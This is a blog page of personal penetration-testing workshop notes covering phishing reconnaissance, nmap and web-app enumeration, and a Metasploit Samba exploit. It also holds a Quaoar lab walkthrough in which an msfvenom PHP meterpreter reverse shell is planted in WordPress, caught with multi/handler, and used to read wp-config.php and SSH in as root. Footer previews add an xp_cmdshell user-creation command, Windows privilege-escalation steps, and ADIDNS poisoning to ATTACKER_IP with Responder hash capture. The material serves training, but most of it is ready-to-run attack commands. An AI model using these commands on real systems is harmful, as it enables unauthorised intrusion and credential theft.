Skip to main content

CISCO workshop

CISCO workshop

==================== PHISHING CAMPAIGN ==================================================
Passive Reconnaisance
-----------------------------------------------------------------------------------------
site.sqcury, qwtera is a virus total vendor

crawling --> digging into a site

namecheap --> can buy all kinds of domains.. phishing sites as well.

check for patterns and directories

typosquatting --> url hijacking

phishng sites:

http://cawpmnttraffi.com/  --> limitedverz.info  -->

pishtank --> cisco's

campaigns --> 1000 sites comprise can drop a malware (phishing campaign)


https://sitecheck.sucuri.net/  --> check phishng sites; https://www.virustotal.com/

==============================================================================================================
--------------------------------------------------------------------------------------------------------------
==============================================================================================================

nmap --> uses 2 way handshake

------------------------------------------------------------------------------------------------------
================================Active RECONNAISANCE==================================================
------------------------------------------------------------------------------------------------------

find the ip's in the network
-----------------------------
netdiscover -r IP_range

nmap Working:
--------------------

nmap logic is its gonna knock and it gonna "ask are you there!, is port 22 open, it resonds and replies.

nmap sends a syn and wait, sends a fin and waits, all it needs is the port exits or not
its a Combination of arp, netbios and ping. its fingerpringing, finding out the target.

does a arp scan then pings ,..

cripting engine --> can invoke a script as well.

nmap has 3 outputs --> open,closed, filtered

nmap 192.168.25.102
nmap -R 192.168.25.102
--> check for old versions to get vulnerabilities
nmap -sS -sV 192.168.25.102   // -sS = syn scan(stealth), -sV = version scan\

nmap -sS -sV -O -vv 192.168.25.102  // -vv = verbose -o = os

nmap scans frequenly used ports .. 1000 ports
 
enum4linux 192.168.56.102      // enumeration - get more details on the network

dirb site_address

-----------------------------------------------------------------------------------------------------------
======================================= METASPLOIT ========================================================
-----------------------------------------------------------------------------------------------------------

shell = to enter kernel
metasploit built on ruby

metasploit payloads works as dlls
meterpreter shell is stealth.

single and staged(established a connection, pushes a code to work on it ) payload

reverse shell = once you get a shell, give it back to me. connect me again

-----------------------------------------------------------------------------------------
EXPLOITING SAMBA VULNERABILITY
-----------------------------------------------------------------------------------------
msfconsole

use exploit/multi/samba/usermap_script
show options
set RHOST 192.168.149.102
set LHOST 192.168.149.101
set LPORT 4444
show options
run

svchost.exe --> collection of dlls'

google bombing

emoted trojans

--------------------------------------------------------------------------------------------------------------

=================================== HACKING QUAOAR ========================================================

---------------------------------------------------------------------------------------------------------------
netdiscover -r ip
ping target
nmap -sS -sV -O -vv ip

--> if port 80 is open
dirb http://ip
check for robots.txt --> ip/robots.txt

check for the application version

enum4linux ip

check for usernames and accounts
----------------------------------------------------
niktos --> fingerpringing tool for checking the applications

nikto -h taraget_IP

beautiful soup --> python crawler

------------------------------------------------------------

quaror has a wordpres in built, so we need to check to wp vunlerabilities

wpscan --url http://192.168.56.101/wordpress

//check for users
wpscan --url http://192.168.56.101/wordpress --enumerate user

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.56.101 lport=4444 –f raw > shell.php
//paste the code into the wp page

msfconsole
use exploit multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.56.102
set lport 4444

// open the wp page that you

exploit the shit

//go into the wp-config.php  file
//download and open it or use

cat wp-config.php

ssh root@192.168.56.101
rootpassword!





































Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/